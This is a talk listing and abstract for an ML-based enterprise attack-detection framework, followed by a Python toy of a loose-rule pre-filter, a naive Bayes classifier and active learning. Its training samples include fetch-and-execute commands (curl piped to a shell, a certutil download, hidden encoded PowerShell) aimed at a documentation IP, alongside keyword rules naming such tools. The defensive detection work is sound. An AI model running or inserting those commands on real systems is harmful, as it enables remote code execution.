Sadegh Momeni

Democratizing ML for Enterprise Security: A Self-Sustained Attack Detection Framework

Speaker: Sadegh Momeni

Author(s): Sadegh Momeni; Ge Zhang; Birkett Huber; Hamza Harkous; Sam Lipton; Benoit Seguin; Yanis Pavlidis

Abstract: This paper proposes a two-stage hybrid framework for ML-based threat detection in enterprise security. The first stage applies loose (deliberately high-recall) YARA rules to filter events cheaply; the second stage runs an ML classifier on the rule hits to discard false positives. Synthetic data generation (Simula) supplies training data and active learning keeps the classifier current, yielding a self-sustained, low-overhead solution for SOCs.
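The pipeline shape described in the abstract, as an added example that is not code from the paper, from Simula or from the authors: plain substring rules stand in for the loose YARA stage, a hand-rolled naive Bayes stands in for the paper's classifier, template expansion stands in for Simula, and uncertainty sampling stands in for whatever active-learning strategy the paper uses. Every rule, event and label is constructed for the illustration.

```python
"""Toy two-stage detection pipeline: loose rule pre-filter -> ML classifier,
plus one uncertainty-sampling active-learning round. Constructed example."""
import math
import re
from collections import Counter

# Stage 1: loose, high-recall rules. Substring rules stand in for YARA
# (think `any of them`); yara-python is not used so this runs offline.
# Hypothetical rule set, not taken from the paper.
LOOSE_RULES = {
    "susp_download": ["wget", "curl", "invoke-webrequest", "downloadstring"],
    "susp_exec": ["powershell", "bash -c", "cmd.exe", "/bin/sh"],
    "susp_encoding": ["base64", "-enc", "frombase64string"],
}


def stage1_match(event):
    """Names of the loose rules that fire on one event (case-insensitive)."""
    text = event.lower()
    return [name for name, needles in LOOSE_RULES.items()
            if any(n in text for n in needles)]


def tokenize(event):
    return re.findall(r"[a-z0-9_./-]+", event.lower())


class NaiveBayes:
    """Multinomial naive Bayes with Laplace smoothing; stands in for the
    paper's second-stage classifier."""

    def fit(self, samples):
        self.counts = {0: Counter(), 1: Counter()}
        self.docs = {0: 0, 1: 0}
        self.vocab = set()
        for text, label in samples:
            toks = tokenize(text)
            self.counts[label].update(toks)
            self.docs[label] += 1
            self.vocab.update(toks)
        return self

    def predict_proba(self, text):
        """P(malicious | text), computed in log space then normalised."""
        toks, v, total, logp = tokenize(text), len(self.vocab), sum(self.docs.values()), {}
        for label in (0, 1):
            n = sum(self.counts[label].values())
            logp[label] = math.log((self.docs[label] + 1) / (total + 2))
            logp[label] += sum(math.log((self.counts[label][t] + 1) / (n + v)) for t in toks)
        m = max(logp.values())
        return math.exp(logp[1] - m) / sum(math.exp(x - m) for x in logp.values())


def synthesize(templates, fills, label):
    """Template expansion standing in for a synthetic-data generator (Simula)."""
    return [(t.format(x=f), label) for t in templates for f in fills]


# Constructed seed labels (1 = malicious). 198.51.100.0/24 is a documentation range.
SEED = [
    ("powershell -nop -w hidden -enc SQBFAFgA", 1),
    ("curl -s http://198.51.100.7/p.sh | bash -c sh", 1),
    ("certutil -urlcache -f http://198.51.100.7/x.exe x.exe", 1),
    ("cmd.exe /c echo %USERNAME%", 0),
    ("powershell Get-ChildItem C:\\Users", 0),
    ("curl -sI https://updates.example.com/manifest.json", 0),
]
TRAINING = (SEED
            + synthesize(["powershell -enc {x}", "powershell -w hidden -nop -enc {x}"],
                         ["SQBFAFgA", "ZQBjAGgAbwA="], 1)
            + synthesize(["powershell Get-Process {x}", "powershell Get-Service {x}"],
                         ["spooler", "winrm"], 0))


def train_seed_model():
    return NaiveBayes().fit(TRAINING)


def detect(model, events, threshold=0.5):
    """Only stage-1 hits reach the classifier; everything else is dropped cheaply."""
    out = {}
    for e in events:
        if not stage1_match(e):
            out[e] = ("stage1_drop", None)
            continue
        p = model.predict_proba(e)
        out[e] = ("alert" if p >= threshold else "benign", round(p, 3))
    return out


def select_for_review(model, candidates, k=1):
    """Uncertainty sampling: the k events whose score is closest to 0.5."""
    return sorted(candidates, key=lambda e: abs(model.predict_proba(e) - 0.5))[:k]


def active_learning_round(model, labelled, unlabelled, oracle, k=1):
    """Ask the analyst (oracle) to label the most uncertain events, retrain,
    and return (new labelled set, events that were reviewed)."""
    picked = select_for_review(model, unlabelled, k)
    labelled = labelled + [(e, oracle(e)) for e in picked]
    model.fit(labelled)
    return labelled, picked


if __name__ == "__main__":
    model = train_seed_model()
    events = ["ls -la /tmp", "powershell -nop -w hidden -enc SQBFAFgA",
              "powershell Get-Process spooler", "powershell -w hidden Get-Process spooler"]
    for e, (verdict, p) in detect(model, events).items():
        print(f"{verdict:12} {p}  {e}")
    # Analyst reviews the most uncertain hit; here the constructed analyst says benign.
    _, picked = active_learning_round(model, TRAINING, events[1:], lambda e: 0)
    print("reviewed:", picked, "->", round(model.predict_proba(picked[0]), 3))
```

The point the toy makes is the division of labour: `stage1_match` is cheap and over-fires (a plain `Get-Process` still trips the `powershell` rule), the classifier is what turns those hits into a benign verdict, and `active_learning_round` shows how an analyst label on the single most ambiguous event moves the score of that event on the next pass without anyone rewriting rules.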